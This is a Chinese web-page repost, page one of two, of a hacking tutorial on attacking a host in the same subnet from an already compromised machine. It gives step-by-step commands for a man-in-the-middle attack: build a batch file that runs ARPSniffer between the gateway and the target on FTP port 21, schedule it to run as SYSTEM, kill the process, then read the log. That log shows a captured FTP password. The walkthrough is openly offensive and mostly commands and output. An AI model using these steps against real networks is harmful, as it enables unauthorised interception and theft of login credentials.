当前位置:七道奇文章资讯安全技术网络技术
日期:2011-11-17 15:17:00  来源:本站整理

分享C段浸透攻击必看的技术知识[网络技术]

赞助商链接



  本文“分享C段浸透攻击必看的技术知识[网络技术]”是由七道奇为您精心收集,来源于网络转载,文章版权归文章作者所有,本站不对其观点以及内容做任何评价,请读者自行判断,以下是其具体内容:

假定想攻击的主机IP是:61.139.1.79
同一子网下我们已有权限的主机IP是:61.139.1.88并可以3389登陆
 
第一步:
tracert 61.139.1.1
 
C:\WIN2000\system32>tracert 61.139.1.1
 
Tracing route to HACK-4FJ7EARC [61.139.1.1]
over a maximum of 30 hops:
 
  1   <10 ms   <10 ms   <10 ms  HACK-4FJ7EARC [61.139.1.1]
 
Trace complete.
 
这就阐明了你想攻击的主机和你所在的主机在一个关网中那么就有大概
举行ARPSNIFFER了
 
第二步:看本机IP设置和网卡情形
C:\WIN2000\system32>ipconfig /all
 
Windows 2000 IP Configuration
 
        Host Name . . . . . . . . . . . . : smscomputer
        Primary DNS Suffix  . . . . . . . :
        Node Type . . . . . . . . . . . . : Broadcast
        IP Routing Enabled. . . . . . . . : No
        WINS Proxy Enabled. . . . . . . . : No
 
Ethernet adapter Intel Fast Ethernet LAN Controller - onboard:
 
        Connection-specific DNS Suffix  . :
        Description . . . . . . . . . . . : Intel(R) 8255x Based Network Connection
        Physical Address. . . . . . . . . : 00-B0-D0-22-10-C6
        DHCP Enabled. . . . . . . . . . . : No
        IP Address. . . . . . . . . . . . : 61.139.1.2
        Subnet Mask . . . . . . . . . . . : 255.255.255.0
        Default Gateway . . . . . . . . . : 61.139.1.65
        DNS Servers . . . . . . . . . . . : 61.139.1.73
 
阐明只有一块网卡那么在履行ARPSNIFFER的时刻便可以不要第五个参数了这个地
方小榕的主页可没有说哟,经过测试我发觉假如只有一块网卡你第五个参数利用0
的话也只能嗅探到通过自已的数据哟.
从上面我们还可以知道网关是61.139.1.65
 
第三步:查看本机时间
C:\WIN2000\system32>net time \\127.0.0.1
 
\\127.0.0.1 的当前时间是 2003/1/28 下午 09:13
 
号令完成成功
 
要注意的是这儿的时间是12小时式,用at号令应要24小时式
 
第四步:编写启动ARPsniffer的bat文件
C:\WIN2000\system32>echo arpsniffer 61.139.1.65 61.139.1.79 21 1.txt /reset>c:\winnt\a.bat
 
注意咯我们没有要第五个参数,假若有多个网卡的话你就要先直接履行arpsniffer显示以下:
ARPSniffer 0.5 (Router Inside), by netXeyes, Special Thanks BB
www.netXeyes.com 2002, security@vip.sina.com
 
Network Adapter 0: D-Link DE-528 Ethernet PCI Adapter
Network Adapter 1: Intel(R) PRO/100+ PCI Adapter(这个地方选第五个参数)
 
Usage: ArpSniffer <IP1> <IP2> <Sniffer TCP Port> <LogFile> <NetAdp> [/RESET]
 
第五步:后台运行开始嗅探咯
C:\winnt\system32>at \\127.0.0.1 20:44 c:\winnt\a.bat
 
注意:这儿的时间要用24小时式
     arpsniffer最好拷到system32目录下,记录文件也会生成在这儿
     履行完第四步要先安装WINPCAP 2.1驱动
     同时arpsniffer要利用最新的0.5版,老版本有不少BUG并且要改注册表重启机子
 
第六步:看密码但是生成的记录文件不能直接看也不能拷贝所以我们只能先完毕掉
以SYSTEM权限启动的ARPSniffer程序
C:\winnt\system32>pulist
...................
conime.exe        248  NT AUTHORITY\SYSTEM
explorer.exe      1864 SMSCOMPUTER\Administrator
CSRSS.EXE         2256 NT AUTHORITY\SYSTEM
Arpsniffer.exe    2322 NT AUTHORITY\SYSTEM       ----就是它了!
WINLOGON.EXE      2344 NT AUTHORITY\SYSTEM
......................
 
杀了它
C:\winnt\system32>pskill 2322
PsKill v1.03 - local and remote process killer
Copyright (C) 2000 Mark Russinovich
http://www.sysinternals.com
 
Process 2322 killed.
 
C:\winnt\system32>type 1.txt       我的例子中嗅探的是FTP密码:)
 
...............
61.188.218.179(1404)->61.139.1.79(21)PASS aaabbb
61.139.1.79(21)->61.188.218.179(1404)530 User czy82 cannot log in.
61.139.1.79(21)->61.188.218.179(1404)530 User czy82 cannot log in.

[1] [2]  下一页


  以上是“分享C段浸透攻击必看的技术知识[网络技术]”的内容,如果你对以上该文章内容感兴趣,你可以看看七道奇为您推荐以下文章:
  • 分享C段浸透攻击必看的技术知识
  • 本文地址: 与您的QQ/BBS好友分享!
    • 好的评价 如果您觉得此文章好,就请您
        0%(0)
    • 差的评价 如果您觉得此文章差,就请您
        0%(0)

    文章评论评论内容只代表网友观点,与本站立场无关!

       评论摘要(共 0 条,得分 0 分,平均 0 分) 查看完整评论
    Copyright © 2020-2022 www.xiamiku.com. All Rights Reserved .